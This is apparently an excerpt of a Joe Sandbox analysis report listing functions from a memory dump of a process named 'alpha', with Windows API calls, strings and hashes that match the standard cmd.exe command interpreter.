                                                                    • API ID: exit
                                                                    • String ID:
                                                                    • API String ID: 2483651598-0
                                                                    • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                    • Instruction ID: 4b6c9a8579aa24d756733333b5c98f70351e1be5f87670f1ea03cabd36bc8ba0
                                                                    • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                    • Instruction Fuzzy Hash: AEC01230704A4687EB1C7F31255503995775B18615F446438C50785281DD28D40D8230
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: DefaultUser
                                                                    • String ID:
                                                                    • API String ID: 3358694519-0
                                                                    • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                    • Instruction ID: ecd72b29f61774c8bfa4e1ad9b08bb5219d7abe90f0ebbae1c0ce36ef8217016
                                                                    • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                    • Instruction Fuzzy Hash: B3E0C2A2D09AD38AF55C3E5160413B4A973CB687AAFC440B1CA0D012C0492DA85B5238
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                    • Instruction ID: 5cab4f76c4546067514733ca3050df108cf9eface288ff8be212cd36fec7421d
                                                                    • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                    • Instruction Fuzzy Hash: 21F0E921B09B8140FB449F56B54012992A29F48BF4F888335EF7C47BC9DE3CD4538720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                    • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                    • API String ID: 1388555566-2647954630
                                                                    • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                    • Instruction ID: dc0d6907de34c0e112a132f1cb2a8ca44c3a3c1085edff714ca9f22c3ba28737
                                                                    • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                    • Instruction Fuzzy Hash: F5A28531A08F82CAEB14AF25A4155B9E7B2FB49B68F849135DA0E47794DF3CD40AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                    • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                    • API String ID: 511550188-726566285
                                                                    • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                    • Instruction ID: 242b18758ec38a963ee07e5a9ecc2dbce4d0ecdc54319943b738a0d301ac397b
                                                                    • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                    • Instruction Fuzzy Hash: 0A52B231E08E5286EB25AF15A814279E6B2FB85B68FC45135D94E03794DF3CF85AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsnicmp$wcschr$wcstol
                                                                    • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                    • API String ID: 1738779099-3004636944
                                                                    • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                    • Instruction ID: 34dda3b214798b29409a92167060c5a16d58864fcc0e323190166c869cb9f452
                                                                    • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                    • Instruction Fuzzy Hash: 77727132B08E528AE714AF6695106BDB7B2FB44BACF814135CE0D57794DE3CA84AC370
                                                                    APIs
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719687F44
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719687F5C
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719687F9E
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719687FFF
                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688020
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688036
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688061
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719688075
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196880D6
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF7196880EA
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF719688177
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF71968819A
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF7196881BD
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF7196881DC
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF7196881FB
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF71968821A
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF719688239
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688291
                                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196882D7
                                                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196882FB
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71968831A
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688364
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719688378
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71968839A
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196883AE
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196883E6
                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688403
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688418
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                    • API String ID: 3637805771-3100821235
                                                                    • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                    • Instruction ID: 490d761c2b3d716a2c6db4a535d0a67ba9272d952538e5dbb009e22b9996fe4d
                                                                    • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                    • Instruction Fuzzy Hash: 52E18031A08F52CAE710AF65A400579FAB2FB49BA9B849275CD1E53794DF3CA40EC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                    • String ID: %s$%s
                                                                    • API String ID: 3623545644-3518022669
                                                                    • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                    • Instruction ID: 2da74819af756f248a0a397c251fa085010ff636d4044d3f9d9ac7cf8f503df7
                                                                    • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                    • Instruction Fuzzy Hash: 9CD28231A08B42CAEB64AF2194516B9F7B2FB45B6CF904039DA4D47A95DF3CE44A8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                    • String ID: %9d$%s
                                                                    • API String ID: 4286035211-3662383364
                                                                    • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                    • Instruction ID: eac547ebfeccb243540ea0ae359db15f0493050b07be0061cec21797bc68c834
                                                                    • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                    • Instruction Fuzzy Hash: DE526332A08F82CAEB64AF64D8506F9A7B2FB4576CF805135DA0E47794DF3CD54A8720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcsrchr$towlower
                                                                    • String ID: fdpnxsatz
                                                                    • API String ID: 3267374428-1106894203
                                                                    • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                    • Instruction ID: 765f1ac5998ff9caa5f5bc8d8089ead60f640b9a35aa8837a41d56d5cde72d0f
                                                                    • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                    • Instruction Fuzzy Hash: 2442B922B08E42C5EB58AF1595102B9A7B3FF55BA8F955536DE0E07784DF3CE44A8330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                    • String ID: DPATH
                                                                    • API String ID: 95024817-2010427443
                                                                    • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                    • Instruction ID: e505f936044834705a755fb3214613dcd5157ecde0e5765606ab42202efa605d
                                                                    • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                    • Instruction Fuzzy Hash: 74128431A08B82CAE764AF159440579F7B2FB89B68F845139DA4E47794DF3CD40AC730
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [...]$ [..]$ [.]$...$:
                                                                    • API String ID: 0-1980097535
                                                                    • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                    • Instruction ID: faa523dfbf1a81df977d4aacda47135cd8699e5c50febdb9bfca641761fff74a
                                                                    • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                    • Instruction Fuzzy Hash: DE328D32A08F82C6EB60AF21D5556F9A3B6EB45BACF804131DA0D47695DF3CE50AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                    • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                    • API String ID: 1795611712-3662956551
                                                                    • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                    • Instruction ID: 56c6c9633fc6711d57d8d3eac0c883fa4ef00964ecf06d69c15e350fb7c37ba7
                                                                    • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                    • Instruction Fuzzy Hash: 21E19F61A08E42D6EB10AF65A8515B9E6B3FF44BACFC44136D90E47695EF3CE50E8330
                                                                    APIs
                                                                    • _wcsupr.MSVCRT ref: 00007FF71968EF33
                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EF98
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EFA9
                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EFBF
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF71968EFDC
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EFED
                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F003
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F022
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F083
                                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F092
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F0A5
                                                                    • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF71968F0DB
                                                                    • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F135
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F16C
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F185
                                                                      • Part of subcall function 00007FF7196701B8: _get_osfhandle.MSVCRT ref: 00007FF7196701C4
                                                                      • Part of subcall function 00007FF7196701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF7196701D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                    • String ID: <noalias>$CMD.EXE
                                                                    • API String ID: 1161012917-1690691951
